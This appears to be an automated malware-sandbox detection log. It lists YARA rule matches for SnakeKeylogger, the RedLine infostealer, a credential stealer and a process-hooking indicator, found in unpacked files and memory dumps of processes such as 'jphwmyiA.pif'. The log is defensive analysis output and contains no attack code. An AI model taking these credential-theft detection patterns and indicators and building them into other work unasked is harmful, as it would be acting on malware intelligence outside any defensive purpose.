Source: 12.2.jphwmyiA.pif.25f299de.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.25f299de.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.25f299de.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.brightness.exe.21659f78.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.jphwmyiA.pif.1cb10ee8.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.jphwmyiA.pif.1cb10ee8.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.jphwmyiA.pif.1cb10ee8.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.Aiymwhpj.PIF.211f67a8.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.jphwmyiA.pif.28730000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.28730000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.3.jphwmyiA.pif.187dcca8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.jphwmyiA.pif.2a03a8c6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.jphwmyiA.pif.2c9b0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 20.2.jphwmyiA.pif.2c9b0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.3.jphwmyiA.pif.187dcca8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.jphwmyiA.pif.2c9b0000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.jphwmyiA.pif.2a03a8c6.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.jphwmyiA.pif.2a03a8c6.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.3.jphwmyiA.pif.187dcca8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 20.3.jphwmyiA.pif.283edba0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.jphwmyiA.pif.1a1d99de.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.28730000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.jphwmyiA.pif.28fc0000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 20.3.jphwmyiA.pif.283edba0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.jphwmyiA.pif.1a1d99de.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.jphwmyiA.pif.28fc0000.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.3.jphwmyiA.pif.283edba0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.jphwmyiA.pif.28fc0000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.jphwmyiA.pif.1a1d99de.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000C.00000002.3410702228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000010.00000001.2321191405.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000014.00000002.3410815376.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000014.00000001.2400403863.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.3410753000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000C.00000001.2208904113.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: jphwmyiA.pif PID: 6396, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
